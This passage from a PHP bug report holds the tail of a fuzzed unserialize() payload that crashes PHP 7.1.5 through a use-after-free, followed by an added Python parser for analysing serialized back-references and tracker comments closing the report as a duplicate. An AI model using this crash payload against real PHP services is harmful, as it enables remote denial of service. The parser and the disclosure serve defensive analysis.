"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"s";i:-6;s:1:"0";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:1;s:1:"s";d:1;s:1:"2";R:+7;s:1:"s";i:-6;s:1:"y";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:20;s:1:"A";i:0;s:1:"d";i:2;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:7:"0010day";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:20;s:1:"1";i:0;s:1:"d";i:2;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"
6";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"3";d:1;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:7:"-000day";d:1;s:1:"i";R:+7;s:1:"s";i:6;s:7:"-000day";d:1;s:1:"i";i:2;s:1:"u";i:0;s:1:"d";i:00;s:1:"m";d:1;s:1:"i";i:2;s:1:"s";i:-6;s:1:"A";d:1;s:1:"y";d:1;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";R:07;s:1:"s";i:-6;s:1:"A";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"s";i:-6;s:2:"0y";d:1;s:1:"|";i:2;s:1:"s";d:1;s:1:"i";R:+7;s:1:"s";i:-6;s:1:"A";d:1;s:1:"i";i:20;s:1:"A";';
    unserialize($crashed_data);
?>
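The report never spells out what the fuzzed blobs declare or where their back-references point, and the ASAN output from the unmodified 7.1.5 build shows the freed 288-byte region being released by zend_hash_do_resize from process_nested_data and read again through zval_get_type at var_unserializer.re:637, which is consistent with an R:/r: back-reference resolving to a zval slot that lived inside a property table reallocated underneath it. The Python below is an added example, not part of the report, of php-src or of the fix in bug #74103: a parser for the serialize() format that reproduces the var_hash slot numbering the unserializer uses (every value except an R: back-reference gets a slot; keys get none) so that the R:07, R:+7 and r:6 references in the PoCs can be resolved, flags element counts that overflow a 64-bit zend_long such as the a:200000000000000000000000000000000:{ in the second PoC (recorded as a finding rather than an error, because the PoC visibly relies on such a count being accepted), and turns the pasted hex block into the PoC file without an external hex editor. The names hexdump_to_bytes, PhpSerializeParser and analyze are this example's own; it describes the data and does not reproduce the crash.

```python
import re

def hexdump_to_bytes(text: str) -> bytes:
    # Whitespace-separated hex pairs, as pasted in the report, back into raw bytes
    return bytes.fromhex("".join(text.split()))

class PhpSerializeParser:
    """Parser for serialize() output mirroring two var_unserializer.re behaviours:
    every value except an R: back-reference is pushed into var_hash before its type
    is dispatched and gets a 1-based slot (keys get none), and R:n / r:n must name
    a slot that already exists and is not the value currently being parsed."""
    ZEND_LONG_MIN, ZEND_LONG_MAX = -2**63, 2**63 - 1

    def __init__(self, data: bytes):
        self.data, self.pos = data, 0
        self.slots = []      # slot n lives at self.slots[n - 1]
        self.refs = []       # (offset, "R" or "r", target slot) per back-reference
        self.findings = []   # conditions a hardened consumer should reject
    def _take(self, lit: bytes) -> None:
        if not self.data.startswith(lit, self.pos):
            raise ValueError(f"expected {lit!r} at offset {self.pos}")
        self.pos += len(lit)
    def _until(self, stop: bytes) -> bytes:
        end = self.data.find(stop, self.pos)
        if end < 0:
            raise ValueError(f"unterminated token at offset {self.pos}")
        tok, self.pos = self.data[self.pos:end], end + 1
        return tok
    def _long(self, what: str, stop: bytes = b":") -> int:
        tok = self._until(stop)
        # parse_iv() takes an optional sign plus digits, so "07" and "+7" both read as 7
        if not re.fullmatch(rb"[+-]?\d+", tok):
            raise ValueError(f"bad {what} {tok!r} before offset {self.pos}")
        v = int(tok)
        if not self.ZEND_LONG_MIN <= v <= self.ZEND_LONG_MAX:
            self.findings.append(f"{what} {tok.decode()} overflows zend_long")
        return v
    def _raw(self, n: int) -> bytes:
        if n < 0 or self.pos + n > len(self.data):
            raise ValueError(f"length {n} runs past end of data at offset {self.pos}")
        chunk, self.pos = self.data[self.pos:self.pos + n], self.pos + n
        return chunk
    def _name(self) -> bytes:            # the N:"ClassName": part shared by O: and C:
        n = self._long("class name length")
        self._take(b'"'); name = self._raw(n); self._take(b'":')
        return name
    def _nested(self, count: int, into: dict) -> None:
        for _ in range(count):
            key = self.value(is_key=True)
            into[key] = self.value()
    def value(self, is_key: bool = False):
        start, tag = self.pos, self.data[self.pos:self.pos + 1]
        if is_key and tag not in (b"i", b"s", b"S"):
            raise ValueError(f"array key must be int or string at offset {start}")
        slot = None if is_key or tag == b"R" else len(self.slots) + 1
        if slot:
            self.slots.append(None)      # var_push() runs before the type switch
        if tag == b"N":
            self._take(b"N;"); val = None
        elif tag == b"i":
            self._take(b"i:"); val = self._long("int", b";")
        elif tag == b"d":
            self._take(b"d:"); val = float(self._until(b";").decode())
        elif tag in (b"s", b"S"):
            self._take(tag + b":"); n = self._long("string length")
            self._take(b'"'); val = self._raw(n); self._take(b'";')
        elif tag == b"a":
            self._take(b"a:"); n = self._long("array count"); self._take(b"{")
            val = {}; self.slots[slot - 1] = val   # visible to back-references inside it
            self._nested(n, val); self._take(b"}")
        elif tag == b"O":
            self._take(b"O:"); cls = self._name(); n = self._long("property count")
            self._take(b"{"); props = {}; val = (cls, props); self.slots[slot - 1] = val
            self._nested(n, props); self._take(b"}")
        elif tag == b"C":
            self._take(b"C:"); cls = self._name(); n = self._long("payload length")
            self._take(b"{"); val = (cls, self._raw(n)); self._take(b"}")
        elif tag in (b"R", b"r"):
            self._take(tag + b":"); target = self._long("reference id", b";")
            self.refs.append((start, tag.decode(), target))
            if not 1 <= target <= len(self.slots) or target == slot:
                self.findings.append(f"{tag.decode()}:{target} at offset {start} names no existing slot")
                val = None
            else:
                val = self.slots[target - 1]
        else:
            raise ValueError(f"unknown type tag {tag!r} at offset {start}")
        if slot:
            self.slots[slot - 1] = val
        return val

def analyze(data: bytes) -> dict:
    """Report value, var_hash slots, back-references and findings for data; a
    parse error is recorded rather than raised so earlier findings survive."""
    p, report = PhpSerializeParser(data), {"value": None, "error": None}
    try:
        report["value"] = p.value()
    except ValueError as e:
        report["error"] = str(e)
    report.update(slots=p.slots, refs=p.refs, findings=p.findings)
    return report
```

Run analyze(hexdump_to_bytes(open("dump.txt").read())) on the hex block from the first report; parsing stops with an error at the first malformed token, but the refs and findings gathered up to that point are kept in the returned dict. On a well-formed input such as a:2:{i:0;s:1:"x";i:1;R:2;} it resolves R:2 to the string in slot 2, which is exactly the numbering a reviewer needs in mind when reading the R:/r: handlers in var_unserializer.re.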
 [2017-08-04 10:28 UTC] varsleak at gmail dot com
-Type: Bug +Type: Security -Private report: No +Private report: Yes
 [2017-08-04 10:28 UTC] varsleak at gmail dot com
It will cause a Remote Denial of Service vulnerability.
 [2017-08-12 13:14 UTC] nikic@php.net
-Status: Open +Status: Duplicate
 [2017-08-12 13:14 UTC] nikic@php.net
This is a duplicate of bug #74103, which is now fixed.
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.